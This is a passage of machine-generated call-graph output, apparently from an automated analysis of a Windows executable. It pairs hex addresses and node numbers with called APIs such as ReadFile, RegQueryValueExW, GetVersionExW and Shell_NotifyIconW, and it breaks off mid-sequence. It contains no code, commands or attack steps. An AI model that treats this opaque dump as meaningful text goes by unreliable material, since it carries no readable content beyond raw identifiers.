22e7f8 __alldvrm 97637->97641 97645 2336b2 11 API calls 2 library calls 97637->97645 97639 22e7ed 97644 232b5c 26 API calls __cftof 97639->97644 97641->97634 97643->97639 97644->97641 97645->97641 97647 2422d0 __wsopen_s 97646->97647 97648 203af6 GetCurrentDirectoryW 97647->97648 97649 208577 22 API calls 97648->97649 97650 203b19 97649->97650 97650->97244 97686 20b120 97651->97686 97654 206d47 97655 206d5e 97654->97655 97656 206de5 SetFilePointerEx SetFilePointerEx 97655->97656 97657 24592a SetFilePointerEx 97655->97657 97658 245919 97655->97658 97659 203c5e 97655->97659 97656->97659 97658->97657 97659->97261 97659->97262 97660->97247 97661->97258 97662->97226 97663->97272 97664->97277 97665->97322 97666->97322 97667->97322 97668->97322 97669->97322 97670->97322 97671->97322 97672->97226 97673->97241 97674->97319 97675->97319 97677 2714d2 97676->97677 97678 271499 97676->97678 97677->97300 97678->97677 97679 22014b 22 API calls 97678->97679 97679->97677 97680->97309 97681->97321 97682->97321 97683->97322 97684->97307 97685->97254 97687 20b19b 97686->97687 97688 20b12e 97686->97688 97693 21f18b SetFilePointerEx 97687->97693 97690 203b2d 97688->97690 97691 20b16c ReadFile 97688->97691 97690->97654 97691->97690 97692 20b186 97691->97692 97692->97688 97692->97690 97693->97688 97699 27383b 97694->97699 97695 2736fc 97695->97330 97695->97347 97696 20684a 40 API calls 97696->97699 97697 2732bd 27 API calls 97697->97699 97698 206874 64 API calls 97698->97699 97699->97695 97699->97696 97699->97697 97699->97698 97701 272ca6 97700->97701 97702 272c98 97700->97702 97704 272ceb 97701->97704 97705 22e95b 29 API calls 97701->97705 97728 272caf 97701->97728 97703 22e95b 29 API calls 97702->97703 97703->97701 97729 272f16 40 API calls __fread_nolock 97704->97729 97707 272cd0 97705->97707 97707->97704 97709 272cd9 97707->97709 97708 272d2f 97710 272d54 97708->97710 97711 272d33 97708->97711 97709->97728 97737 22e9e8 97709->97737 97730 272b30 97710->97730 97712 272d40 97711->97712 97715 22e9e8 67 API calls 97711->97715 97717 22e9e8 67 API calls 97712->97717 97712->97728 97715->97712 97716 272d5c 97718 272d82 97716->97718 97719 272d62 97716->97719 97717->97728 97750 272db2 74 API calls 97718->97750 97721 272d6f 97719->97721 97722 22e9e8 67 API calls 97719->97722 97723 22e9e8 67 API calls 97721->97723 97721->97728 97722->97721 97723->97728 97724 272d89 97725 272d9d 97724->97725 97726 22e9e8 67 API calls 97724->97726 97727 22e9e8 67 API calls 97725->97727 97725->97728 97726->97725 97727->97728 97728->97347 97729->97708 97731 22ed7c ___std_exception_copy 21 API calls 97730->97731 97732 272b3e 97731->97732 97733 22ed7c ___std_exception_copy 21 API calls 97732->97733 97734 272b4f 97733->97734 97735 22ed7c ___std_exception_copy 21 API calls 97734->97735 97736 272b5b 97735->97736 97736->97716 97738 22e9f4 ___DestructExceptionObject 97737->97738 97739 22ea05 97738->97739 97740 22ea1a 97738->97740 97768 22f649 20 API calls __dosmaperr 97739->97768 97747 22ea15 __wsopen_s 97740->97747 97751 2294fd EnterCriticalSection 97740->97751 97742 22ea0a 97769 232b5c 26 API calls __cftof 97742->97769 97745 22ea36 97752 22e972 97745->97752 97747->97728 97748 22ea41 97770 22ea5e LeaveCriticalSection __fread_nolock 97748->97770 97750->97724 97751->97745 97753 22e994 97752->97753 97754 22e97f 97752->97754 97760 22e98f 97753->97760 97771 22df7b 97753->97771 97796 22f649 20 API calls __dosmaperr 97754->97796 97756 22e984 97797 232b5c 26 API calls __cftof 97756->97797 97760->97748 97763 22dcc5 __fread_nolock 26 API calls 97764 22e9b6 97763->97764 97781 2389af 97764->97781 97768->97742 97769->97747 97770->97747 97772 22df93 97771->97772 97774 22df8f 97771->97774 97773 22dcc5 __fread_nolock 26 API calls 97772->97773 97772->97774 97775 22dfb3 97773->97775 97777 2350ed 97774->97777 97798 235d31 62 API calls 5 library calls 97775->97798 97778 235103 97777->97778 97779 22e9b0 97777->97779 97778->97779 97780 232d38 _free 20 API calls 97778->97780 97779->97763 97780->97779 97782 2389d3 97781->97782 97783 2389be 97781->97783 97785 238a0e 97782->97785 97788 2389fa 97782->97788 97802 22f636 20 API calls __dosmaperr 97783->97802 97796->97756 97797->97760 97798->97774 97822->96995 97824 2039eb 97823->97824 97825 205f4e 97823->97825 97824->97004 97857 26d11f 42 API calls 97824->97857 97825->97824 97826 245070 DestroyIcon 97825->97826 97826->97824 97828 2061c6 97827->97828 97847 2062a8 97827->97847 97858 207ad5 97828->97858 97831 2061e1 97833 208577 22 API calls 97831->97833 97832 245278 LoadStringW 97835 245292 97832->97835 97834 2061f6 97833->97834 97836 206203 97834->97836 97843 2452ae 97834->97843 97838 20bed9 22 API calls 97835->97838 97842 206229 ___scrt_fastfail 97835->97842 97836->97835 97837 20620d 97836->97837 97839 206b7c 22 API calls 97837->97839 97838->97842 97840 20621b 97839->97840 97863 207bb5 22 API calls 97840->97863 97845 20628e Shell_NotifyIconW 97842->97845 97843->97842 97844 2452f1 97843->97844 97846 20bf73 22 API calls 97843->97846 97866 21fe6f 51 API calls 97844->97866 97845->97847 97848 2452d8 97846->97848 97847->97006 97864 26a350 23 API calls 97848->97864 97851 2452e3 97865 207bb5 22 API calls 97851->97865 97852 245310 97854 206b7c 22 API calls 97852->97854 97855 245321 97854->97855 97856 206b7c 22 API calls 97855->97856 97856->97842 97857->97004 97859 22017b 22 API calls 97858->97859 97860 207afa 97859->97860 97861 22014b 22 API calls 97860->97861 97862 2061d4 97861->97862 97862->97831 97862->97832 97863->97842 97864->97851 97865->97844 97866->97852 97868 206bb4 _wcslen 97867->97868 97869 245860 97868->97869 97870 206bc7 97868->97870 97871 22014b 22 API calls 97869->97871 97877 207d74 97870->97877 97874 24586a 97871->97874 97873 206bd4 __fread_nolock 97873->97031 97875 22017b 22 API calls 97874->97875 97876 24589a __fread_nolock 97875->97876 97878 207d8a 97877->97878 97881 207d85 __fread_nolock 97877->97881 97879 22017b 22 API calls 97878->97879 97880 246528 97878->97880 97879->97881 97880->97880 97881->97873 97883 224f4b _abort 97882->97883 97884 224f52 97883->97884 97885 224f64 97883->97885 97921 225099 GetModuleHandleW 97884->97921 97906 2332d1 EnterCriticalSection 97885->97906 97888 224f57 97888->97885 97922 2250dd GetModuleHandleExW 97888->97922 97889 225009 97910 225049 97889->97910 97893 224fe0 97898 224ff8 97893->97898 97903 232791 _abort 5 API calls 97893->97903 97895 224f6b 97895->97889 97895->97893 97907 232518 97895->97907 97896 225052 97930 2420a9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 97896->97930 97897 225026 97913 225058 97897->97913 97899 232791 _abort 5 API calls 97898->97899 97899->97889 97903->97898 97906->97895 97931 232251 97907->97931 97950 233319 LeaveCriticalSection 97910->97950 97912 225022 97912->97896 97912->97897 97951 23397f 97913->97951 97916 225086 97919 2250dd _abort 8 API calls 97916->97919 97917 225066 GetPEB 97917->97916 97918 225076 GetCurrentProcess TerminateProcess 97917->97918 97918->97916 97920 22508e ExitProcess 97919->97920 97921->97888 97923 225107 GetProcAddress 97922->97923 97924 22512a 97922->97924 97925 22511c 97923->97925 97926 225130 FreeLibrary 97924->97926 97927 225139 97924->97927 97925->97924 97926->97927 97928 220dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97927->97928 97929 224f63 97928->97929 97929->97885 97934 232200 97931->97934 97933 232275 97933->97893 97935 23220c ___DestructExceptionObject 97934->97935 97942 2332d1 EnterCriticalSection 97935->97942 97937 23221a 97943 2322a1 97937->97943 97941 232238 __wsopen_s 97941->97933 97942->97937 97946 2322c1 97943->97946 97947 2322c9 97943->97947 97944 220dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97945 232227 97944->97945 97949 232245 LeaveCriticalSection _abort 97945->97949 97946->97944 97947->97946 97948 232d38 _free 20 API calls 97947->97948 97948->97946 97949->97941 97950->97912 97952 2339a4 97951->97952 97953 23399a 97951->97953 97958 23334a 5 API calls 2 library calls 97952->97958 97955 220dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97953->97955 97956 225062 97955->97956 97956->97916 97956->97917 97957 2339bb 97957->97953 97958->97957 97959 22f06e 97960 22f07a ___DestructExceptionObject 97959->97960 97961 22f086 97960->97961 97962 22f09b 97960->97962 97978 22f649 20 API calls __dosmaperr 97961->97978 97972 2294fd EnterCriticalSection 97962->97972 97965 22f0a7 97973 22f0db 97965->97973 97966 22f08b 97979 232b5c 26 API calls __cftof 97966->97979 97971 22f096 __wsopen_s 97972->97965 97981 22f106 97973->97981 97975 22f0e8 97976 22f0b4 97975->97976 98001 22f649 20 API calls __dosmaperr 97975->98001 97980 22f0d1 LeaveCriticalSection __fread_nolock 97976->97980 97978->97966 97979->97971 97980->97971 97982 22f114 97981->97982 97983 22f12e 97981->97983 98005 22f649 20 API calls __dosmaperr 97982->98005 97984 22dcc5 __fread_nolock 26 API calls 97983->97984 97986 22f137 97984->97986 98002 239789 97986->98002 97987 22f119 98006 232b5c 26 API calls __cftof 97987->98006 97990 22f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 97990->97975 97992 22f23b 97994 22f248 97992->97994 97998 22f1ee 97992->97998 97993 22f1bf 97996 22f1dc 97993->97996 97993->97998 98008 22f649 20 API calls __dosmaperr 97994->98008 98007 22f41f 31 API calls 4 library calls 97996->98007 97998->97990 98009 22f29b 30 API calls 2 library calls 97998->98009 97999 22f1e6 97999->97990 98001->97976 98010 239606 98002->98010 98004 22f153 98004->97990 98004->97992 98004->97993 98005->97987 98006->97990 98007->97999 98008->97990 98009->97990 98011 239612 ___DestructExceptionObject 98010->98011 98012 239632 98011->98012 98013 23961a 98011->98013 98015 2396e6 98012->98015 98020 23966a 98012->98020 98045 22f636 20 API calls __dosmaperr 98013->98045 98050 22f636 20 API calls __dosmaperr 98015->98050 98016 23961f 98046 22f649 20 API calls __dosmaperr 98016->98046 98019 2396eb 98051 22f649 20 API calls __dosmaperr 98019->98051 98035 2354ba EnterCriticalSection 98020->98035 98021 239627 __wsopen_s 98021->98004 98024 2396f3 98052 232b5c 26 API calls __cftof 98024->98052 98025 239670 98027 239694 98025->98027 98028 2396a9 98025->98028 98047 22f649 20 API calls __dosmaperr 98027->98047 98036 23970b 98028->98036 98031 239699 98048 22f636 20 API calls __dosmaperr 98031->98048 98033 2396a4 98049 2396de LeaveCriticalSection __wsopen_s 98033->98049 98035->98025 98037 235737 __wsopen_s 26 API calls 98036->98037 98038 23971d 98037->98038 98039 239736 SetFilePointerEx 98038->98039 98040 239725 98038->98040 98042 23974e GetLastError 98039->98042 98043 23972a 98039->98043 98053 22f649 20 API calls __dosmaperr 98040->98053 98054 22f613 20 API calls 2 library calls 98042->98054 98043->98033 98045->98016 98046->98021 98047->98031 98048->98033 98049->98021 98050->98019 98051->98024 98052->98021 98053->98043 98054->98043 98055 253c0a 98076 26c819 98055->98076 98057 253c14 98059 26c819 Sleep 98057->98059 98060 253c3f 98057->98060 98065 20efdb 98057->98065 98082 21aa65 23 API calls 98057->98082 98059->98057 98061 20b329 22 API calls 98060->98061 98062 253c6f 98061->98062 98083 20bfa5 40 API calls 98062->98083 98064 253c8b 98084 27446f 22 API calls 98064->98084 98069 20f450 98065->98069 98068 20f097 98070 20f483 98069->98070 98071 20f46f 98069->98071 98117 273fe1 82 API calls __wsopen_s 98070->98117 98085 20e960 98071->98085 98073 20f47a 98073->98068 98075 254584 98075->98075 98077 26c824 98076->98077 98078 26c83f 98076->98078 98077->98057 98079 26c86d 98078->98079 98080 26c851 Sleep 98078->98080 98079->98057 98080->98079 98082->98057 98083->98064 98084->98068 98086 210340 191 API calls 98085->98086 98102 20e99d 98086->98102 98087 2531d3 98124 273fe1 82 API calls __wsopen_s 98087->98124 98089 20ea0b ISource 98089->98073 98090 20edd5 98090->98089 98100 22017b 22 API calls 98090->98100 98091 20eac3 98091->98090 98092 20eace 98091->98092 98094 22014b 22 API calls 98092->98094 98093 20ecff 98095 2531c4 98093->98095 98096 20ed14 98093->98096 98105 20ead5 __fread_nolock 98094->98105 98123 286162 22 API calls 98095->98123 98099 22014b 22 API calls 98096->98099 98097 20ebb8 98101 22017b 22 API calls 98097->98101 98110 20eb6a 98099->98110 98100->98105 98112 20eb29 ISource __fread_nolock 98101->98112 98102->98087 98102->98089 98102->98090 98102->98091 98102->98097 98106 22014b 22 API calls 98102->98106 98102->98112 98103 22014b 22 API calls 98104 20eaf6 98103->98104 98104->98112 98118 20d260 191 API calls 98104->98118 98105->98103 98105->98104 98106->98102 98108 2531b3 98122 273fe1 82 API calls __wsopen_s 98108->98122 98110->98073 98112->98093 98112->98108 98112->98110 98113 25318e 98112->98113 98115 25316c 98112->98115 98119 2044fe 191 API calls 98112->98119 98121 273fe1 82 API calls __wsopen_s 98113->98121 98120 273fe1 82 API calls __wsopen_s 98115->98120 98117->98075 98118->98112 98119->98112 98120->98110 98121->98110 98122->98110 98123->98087 98124->98089 98125 2550ca 98136 20f800 ISource 98125->98136 98127 210340 191 API calls 98127->98136 98128 211ca0 22 API calls 98128->98136 98129 20be2d 40 API calls 98129->98136 98130 20bf73 22 API calls 98130->98136 98131 20fae1 98133 20bed9 22 API calls 98133->98136 98136->98127 98136->98128 98136->98129 98136->98130 98136->98131 98136->98133 98137 273fe1 82 API calls 98136->98137 98140 21b35c 191 API calls 98136->98140 98141 2205b2 5 API calls __Init_thread_wait 98136->98141 98142 220413 29 API calls __onexit 98136->98142 98143 220568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98136->98143 98144 285231 102 API calls 98136->98144 98145 28731e 191 API calls 98136->98145 98137->98136 98140->98136 98141->98136 98142->98136 98143->98136 98144->98136 98145->98136 98146 25e737 98147 25e6e4 98146->98147 98150 26e83e SHGetFolderPathW 98147->98150 98151 208577 22 API calls 98150->98151 98152 25e6ed 98151->98152 98153 201033 98158 2068b4 98153->98158 98157 201042 98159 20bf73 22 API calls 98158->98159 98160 206922 98159->98160 98166 20589f 98160->98166 98163 2069bf 98164 201038 98163->98164 98169 206b14 22 API calls __fread_nolock 98163->98169 98165 220413 29 API calls __onexit 98164->98165 98165->98157 98170 2058cb 98166->98170 98169->98163 98171 2058be 98170->98171 98172 2058d8 98170->98172 98171->98163 98172->98171 98173 2058df RegOpenKeyExW 98172->98173 98173->98171 98174 2058f9 RegQueryValueExW 98173->98174 98175 20591a 98174->98175 98176 20592f RegCloseKey 98174->98176 98175->98176 98176->98171 98177 255650 98186 21e3d5 98177->98186 98179 255666 98185 2556e1 98179->98185 98195 21aa65 23 API calls 98179->98195 98182 2561d7 98183 2556c1 98183->98185 98196 27247e 22 API calls 98183->98196 98185->98182 98197 273fe1 82 API calls __wsopen_s 98185->98197 98187 21e3e3 98186->98187 98188 21e3f6 98186->98188 98198 20b4c8 22 API calls 98187->98198 98189 21e429 98188->98189 98190 21e3fb 98188->98190 98199 20b4c8 22 API calls 98189->98199 98192 22014b 22 API calls 98190->98192 98194 21e3ed 98192->98194 98194->98179 98195->98183 98196->98185 98197->98182 98198->98194 98199->98194 98200 2036f5 98203 20370f 98200->98203 98204 203726 98203->98204 98205 20378a 98204->98205 98206 20372b 98204->98206 98242 203788 98204->98242 98208 243df4 98205->98208 98209 203790 98205->98209 98210 203804 PostQuitMessage 98206->98210 98211 203738 98206->98211 98207 20376f DefWindowProcW 98245 203709 98207->98245 98252 202f92 10 API calls 98208->98252 98212 203797 98209->98212 98213 2037bc SetTimer RegisterWindowMessageW 98209->98213 98210->98245 98214 203743 98211->98214 98215 243e61 98211->98215 98217 2037a0 KillTimer 98212->98217 98218 243d95 98212->98218 98219 2037e5 CreatePopupMenu 98213->98219 98213->98245 98220 20374d 98214->98220 98221 20380e 98214->98221 98255 26c8f7 66 API calls ___scrt_fastfail 98215->98255 98227 203907 Shell_NotifyIconW 98217->98227 98225 243dd0 MoveWindow 98218->98225 98226 243d9a 98218->98226 98219->98245 98228 243e46 98220->98228 98229 203758 98220->98229 98250 21fcad 59 API calls ___scrt_fastfail 98221->98250 98223 243e15 98253 21f23c 41 API calls 98223->98253 98225->98245 98233 243da0 98226->98233 98234 243dbf SetFocus 98226->98234 98235 2037b3 98227->98235 98228->98207 98254 261423 22 API calls 98228->98254 98232 203763 98229->98232 98236 2037f2 98229->98236 98230 243e73 98230->98207 98230->98245 98232->98207 98244 203907 Shell_NotifyIconW 98232->98244 98233->98232 98237 243da9 98233->98237 98234->98245 98248 2059ff DeleteObject DestroyWindow 98235->98248 98249 20381f 76 API calls ___scrt_fastfail 98236->98249 98251 202f92 10 API calls 98237->98251 98242->98207 98243 203802 98243->98245 98246 243e3a 98244->98246 98247 20396b 61 API calls 98246->98247 98247->98242 98248->98245 98249->98243 98250->98243 98251->98245 98252->98223 98253->98232 98254->98242 98255->98230 98256 201098 98261 205fc8 98256->98261 98260 2010a7 98262 20bf73 22 API calls 98261->98262 98263 205fdf GetVersionExW 98262->98263 98264 208577 22 API calls 98263->98264 98265 20602c 98264->98265 98266 20adf4 22 API calls 98265->98266 98278 206062 98265->98278 98267 206056 98266->98267 98269 2055dc 22 API calls 98267->98269 98268 20611c GetCurrentProcess IsWow64Process 98270 206138 98268->98270 98269->98278 98271 206150 LoadLibraryA 98270->98271 98272 245269 GetSystemInfo 98270->98272 98273 206161 GetProcAddress 98271->98273 98274 20619d GetSystemInfo 98271->98274 98273->98274 98275 206171 GetNativeSystemInfo 98273->98275 98276 206177 98274->98276 98275->98276 98279 20109d 98276->98279 98280 20617b FreeLibrary 98276->98280 98277 245224 98278->98268 98278->98277 98281 220413 29 API calls __onexit 98279->98281 98280->98279 98281->98260 98282 23947a 98283 239487 98282->98283 98286 23949f 98282->98286 98332 22f649 20 API calls __dosmaperr 98283->98332 98285 23948c 98333 232b5c 26 API calls __cftof 98285->98333 98288 2394fa 98286->98288 98289 239497 98286->98289 98334 240144 21 API calls 2 library calls 98286->98334 98291 22dcc5 __fread_nolock 26 API calls 98288->98291 98292 239512 98291->98292 98302 238fb2 98292->98302 98294 239519 98294->98289 98295 22dcc5 __fread_nolock 26 API calls 98294->98295 98296 239545 98295->98296 98296->98289 98297 22dcc5 __fread_nolock 26 API calls 98296->98297 98298 239553 98297->98298 98298->98289 98299 22dcc5 __fread_nolock 26 API calls 98298->98299 98300 239563 98299->98300 98301 22dcc5 __fread_nolock 26 API calls 98300->98301 98301->98289 98303 238fbe ___DestructExceptionObject 98302->98303 98304 238fc6 98303->98304 98305 238fde 98303->98305 98336 22f636 20 API calls __dosmaperr 98304->98336 98306 2390a4 98305->98306 98311 239017 98305->98311 98343 22f636 20 API calls __dosmaperr 98306->98343 98309 238fcb 98337 22f649 20 API calls __dosmaperr 98309->98337 98314 239026 98311->98314 98315 23903b 98311->98315 98312 2390a9 98344 22f649 20 API calls __dosmaperr 98312->98344 98313 238fd3 __wsopen_s 98313->98294 98338 22f636 20 API calls __dosmaperr 98314->98338 98335 2354ba EnterCriticalSection 98315->98335 98319 23902b 98339 22f649 20 API calls __dosmaperr 98319->98339 98320 239041 98322 239072 98320->98322 98323 23905d 98320->98323 98325 2390c5 __fread_nolock 38 API calls 98322->98325 98340 22f649 20 API calls __dosmaperr 98323->98340 98329 23906d 98325->98329 98326 239033 98345 232b5c 26 API calls __cftof 98326->98345 98328 239062 98341 22f636 20 API calls __dosmaperr 98328->98341 98342 23909c LeaveCriticalSection __wsopen_s 98329->98342 98332->98285 98333->98289 98334->98288 98335->98320 98336->98309 98337->98313 98338->98319 98339->98326 98340->98328 98341->98329 98342->98313 98343->98312 98344->98326 98345->98313 98346 20105b 98351 2052a7 98346->98351 98348 20106a 98382 220413 29 API calls __onexit 98348->98382 98350 201074 98352 2052b7 __wsopen_s 98351->98352 98353 20bf73 22 API calls 98352->98353 98354 20536d 98353->98354 98355 205594 24 API calls 98354->98355 98356 205376 98355->98356 98383 205238 98356->98383 98359 206b7c 22 API calls 98360 20538f 98359->98360 98361 206a7c 22 API calls 98360->98361 98362 20539e 98361->98362 98363 20bf73 22 API calls 98362->98363 98364 2053a7 98363->98364 98365 20bd57 22 API calls 98364->98365 98366 2053b0 RegOpenKeyExW 98365->98366 98367 244be6 RegQueryValueExW 98366->98367 98372 2053d2 98366->98372 98368 244c03 98367->98368 98369 244c7c RegCloseKey 98367->98369 98370 22017b 22 API calls 98368->98370 98369->98372 98381 244c8e _wcslen 98369->98381 98371 244c1c 98370->98371 98374 20423c 22 API calls 98371->98374 98372->98348 98373 20655e 22 API calls 98373->98381 98375 244c27 RegQueryValueExW 98374->98375 98376 244c44 98375->98376 98378 244c5e ISource 98375->98378 98377 208577 22 API calls 98376->98377 98377->98378 98378->98369 98379 20b329 22 API calls 98379->98381 98380 206a7c 22 API calls 98380->98381 98381->98372 98381->98373 98381->98379 98381->98380 98382->98350 98384 2422d0 __wsopen_s 98383->98384 98385 205245 GetFullPathNameW 98384->98385 98386 205267 98385->98386 98387 208577 22 API calls 98386->98387 98388 205285 98387->98388 98388->98359 98389 20f4dc 98392 20cab0 98389->98392 98393 20cacb 98392->98393 98394 25150c 98393->98394 98395 2514be 98393->98395 98422 20caf0 98393->98422 98437 2862ff 191 API calls 2 library calls 98394->98437 98398 2514c8 98395->98398 98401 2514d5 98395->98401 98395->98422 98435 286790 191 API calls 98398->98435 98418 20cdc0 98401->98418 98436 286c2d 191 API calls 2 library calls 98401->98436 98404 25179f 98404->98404 98406 20cf80 40 API calls 98406->98422 98409 2516e8 98440 286669 82 API calls 98409->98440 98412 20be2d 40 API calls 98412->98422 98413 20cdee 98417 21e807 40 API calls 98417->98422 98418->98413 98441 273fe1 82 API calls __wsopen_s 98418->98441 98419 210340 191 API calls 98419->98422 98420 20bed9 22 API calls 98420->98422 98422->98406 98422->98409 98422->98412 98422->98413 98422->98417 98422->98418 98422->98419 98422->98420 98423 21e7c1 40 API calls 98422->98423 98424 21aa99 191 API calls 98422->98424 98425 2205b2 5 API calls __Init_thread_wait 98422->98425 98426 21bc58 98422->98426 98431 220413 29 API calls __onexit 98422->98431 98432 220568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98422->98432 98433 21f4df 82 API calls 98422->98433 98434 21f346 191 API calls 98422->98434 98438 20b4c8 22 API calls 98422->98438 98439 25ffaf 22 API calls 98422->98439 98423->98422 98424->98422 98425->98422 98427 22014b 22 API calls 98426->98427 98428 21bc65 98427->98428 98429 20b329 22 API calls 98428->98429 98430 21bc70 98429->98430 98430->98422 98431->98422 98432->98422 98433->98422 98434->98422 98435->98401 98436->98418 98437->98422 98438->98422 98439->98422 98440->98418 98441->98404 98442 20dd3d 98443 20dd63 98442->98443 98444 2519c2 98442->98444 98445 20dead 98443->98445 98447 22014b 22 API calls 98443->98447 98446 251a82 98444->98446 98450 251a26 98444->98450 98455 251a46 98444->98455 98451 22017b 22 API calls 98445->98451 98496 273fe1 82 API calls __wsopen_s 98446->98496 98454 20dd8d 98447->98454 98494 21e6e8 191 API calls 98450->98494 98461 20dee4 __fread_nolock 98451->98461 98452 251a7d 98456 22014b 22 API calls 98454->98456 98454->98461 98455->98452 98495 273fe1 82 API calls __wsopen_s 98455->98495 98458 20dddb 98456->98458 98457 22017b 22 API calls 98457->98461 98458->98450 98459 20de16 98458->98459 98460 210340 191 API calls 98459->98460 98462 20de29 98460->98462 98461->98455 98461->98457 98462->98452 98462->98461 98463 251aa5 98462->98463 98464 20de77 98462->98464 98466 20d526 98462->98466 98497 273fe1 82 API calls __wsopen_s 98463->98497 98464->98445 98464->98466 98467 22014b 22 API calls 98466->98467 98468 20d589 98467->98468 98484 20c32d 98468->98484 98471 22014b 22 API calls 98477 20d66e ISource 98471->98477 98473 20bed9 22 API calls 98473->98477 98476 251f79 98499 2656ae 22 API calls ISource 98476->98499 98477->98473 98477->98476 98479 251f94 98477->98479 98482 20d911 ISource 98477->98482 98491 20c3ab 22 API calls ISource 98477->98491 98498 20b4c8 22 API calls 98477->98498 98480 20d9ac ISource 98483 20d9c3 98480->98483 98493 21e30a 22 API calls ISource 98480->98493 98482->98480 98492 20c3ab 22 API calls ISource 98482->98492 98490 20c33d 98484->98490 98485 20c345 98485->98471 98486 22014b 22 API calls 98486->98490 98487 20bf73 22 API calls 98487->98490 98488 20c32d 22 API calls 98488->98490 98489 20bed9 22 API calls 98489->98490 98490->98485 98490->98486 98490->98487 98490->98488 98490->98489 98491->98477 98492->98480 98493->98480 98494->98455 98495->98452 98496->98452 98497->98452 98498->98477 98499->98479 98500 210ebf 98501 210ed3 98500->98501 98507 211425 98500->98507 98502 22014b 22 API calls 98501->98502 98505 210ee5 98501->98505 98502->98505 98503 25562c 98589 271b14 22 API calls 98503->98589 98505->98503 98506 210f3e 98505->98506 98588 20b4c8 22 API calls 98505->98588 98525 21049d ISource 98506->98525 98533 212b20 98506->98533 98507->98505 98510 20bed9 22 API calls 98507->98510 98510->98505 98511 22014b 22 API calls 98532 210376 ISource 98511->98532 98512 25632b 98593 273fe1 82 API calls __wsopen_s 98512->98593 98514 211695 98519 20bed9 22 API calls 98514->98519 98514->98525 98516 255cdb 98523 20bed9 22 API calls 98516->98523 98516->98525 98517 25625a 98592 273fe1 82 API calls __wsopen_s 98517->98592 98518 20bed9 22 API calls 98518->98532 98519->98525 98523->98525 98524 2205b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98524->98532 98526 20bf73 22 API calls 98526->98532 98527 256115 98590 273fe1 82 API calls __wsopen_s 98527->98590 98528 210aae ISource 98591 273fe1 82 API calls __wsopen_s 98528->98591 98529 220568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98529->98532 98531 220413 29 API calls pre_c_initialization 98531->98532 98532->98511 98532->98512 98532->98514 98532->98516 98532->98517 98532->98518 98532->98524 98532->98525 98532->98526 98532->98527 98532->98528 98532->98529 98532->98531 98586 211990 191 API calls 2 library calls 98532->98586 98587 211e50 41 API calls ISource 98532->98587 98534 212fc0 98533->98534 98535 212b86 98533->98535 98667 2205b2 5 API calls __Init_thread_wait 98534->98667 98537 212ba0 98535->98537 98538 257bd8 98535->98538 98541 213160 9 API calls 98537->98541 98630 287af9 98538->98630 98540 212fca 98544 20b329 22 API calls 98540->98544 98549 21300b 98540->98549 98543 212bb0 98541->98543 98542 257be4 98542->98532 98545 213160 9 API calls 98543->98545 98554 212fe4 98544->98554 98546 212bc6 98545->98546 98548 212bfc 98546->98548 98546->98549 98547 257bed 98547->98532 98550 257bfd 98548->98550 98563 212c18 __fread_nolock 98548->98563 98549->98547 98669 20b4c8 22 API calls 98549->98669 98672 273fe1 82 API calls __wsopen_s 98550->98672 98553 213049 98670 21e6e8 191 API calls 98553->98670 98668 220568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98554->98668 98556 257c15 98673 273fe1 82 API calls __wsopen_s 98556->98673 98559 257c78 98675 2861a2 54 API calls _wcslen 98559->98675 98560 212d4c 98561 213160 9 API calls 98560->98561 98564 212d59 98561->98564 98563->98553 98563->98556 98565 22014b 22 API calls 98563->98565 98567 22017b 22 API calls 98563->98567 98573 210340 191 API calls 98563->98573 98574 212d3f 98563->98574 98576 257c59 98563->98576 98581 212dd7 ISource 98563->98581 98570 213160 9 API calls 98564->98570 98564->98581 98565->98563 98566 212e8b ISource 98569 212f2d 98566->98569 98666 21e322 22 API calls ISource 98566->98666 98567->98563 98568 213082 98671 21fe39 22 API calls 98568->98671 98569->98532 98575 212d73 98570->98575 98573->98563 98574->98559 98574->98560 98580 20bed9 22 API calls 98575->98580 98575->98581 98674 273fe1 82 API calls __wsopen_s 98576->98674 98577 213160 9 API calls 98577->98581 98580->98581 98581->98566 98581->98568 98581->98577 98594 28ad47 98581->98594 98599 27f94a 98581->98599 98608 289fe8 98581->98608 98611 21ac3e 98581->98611 98676 273fe1 82 API calls __wsopen_s 98581->98676 98586->98532 98587->98532 98588->98505 98589->98525 98590->98528 98591->98525 98592->98525 98593->98525 98677 208ec0 98594->98677 98598 28ad72 98598->98581 98600 22017b 22 API calls 98599->98600 98601 27f95b 98600->98601 98602 20423c 22 API calls 98601->98602 98603 27f965 98602->98603 98604 208ec0 53 API calls 98603->98604 98605 27f97c GetEnvironmentVariableW 98604->98605 98725 27160f 22 API calls 98605->98725 98607 27f999 ISource 98607->98581 98726 2889b6 98608->98726 98610 289ff8 98610->98581 98612 208ec0 53 API calls 98611->98612 98613 21ac68 98612->98613 98614 21bc58 22 API calls 98613->98614 98615 21ac7f 98614->98615 98617 21b09b _wcslen 98615->98617 98818 20c98d 39 API calls 98615->98818 98618 224d98 40 API calls 98617->98618 98619 207ad5 22 API calls 98617->98619 98620 21bbbe 43 API calls 98617->98620 98623 206c03 22 API calls 98617->98623 98624 21b1fb 98617->98624 98625 20c98d 39 API calls 98617->98625 98626 208ec0 53 API calls 98617->98626 98627 208577 22 API calls 98617->98627 98628 20396b 61 API calls 98617->98628 98629 203907 Shell_NotifyIconW 98617->98629 98819 20ad40 22 API calls __fread_nolock 98617->98819 98820 207b1a 22 API calls 98617->98820 98618->98617 98619->98617 98620->98617 98623->98617 98624->98581 98625->98617 98626->98617 98627->98617 98628->98617 98629->98617 98631 287b38 98630->98631 98632 287b52 98630->98632 98828 273fe1 82 API calls __wsopen_s 98631->98828 98821 2860e6 98632->98821 98636 210340 190 API calls 98637 287bc1 98636->98637 98638 287b4a 98637->98638 98639 287c5c 98637->98639 98640 287c03 98637->98640 98638->98542 98641 287cb0 98639->98641 98642 287c62 98639->98642 98648 27148b 22 API calls 98640->98648 98641->98638 98643 208ec0 53 API calls 98641->98643 98829 271ad8 22 API calls 98642->98829 98644 287cc2 98643->98644 98646 20c2c9 22 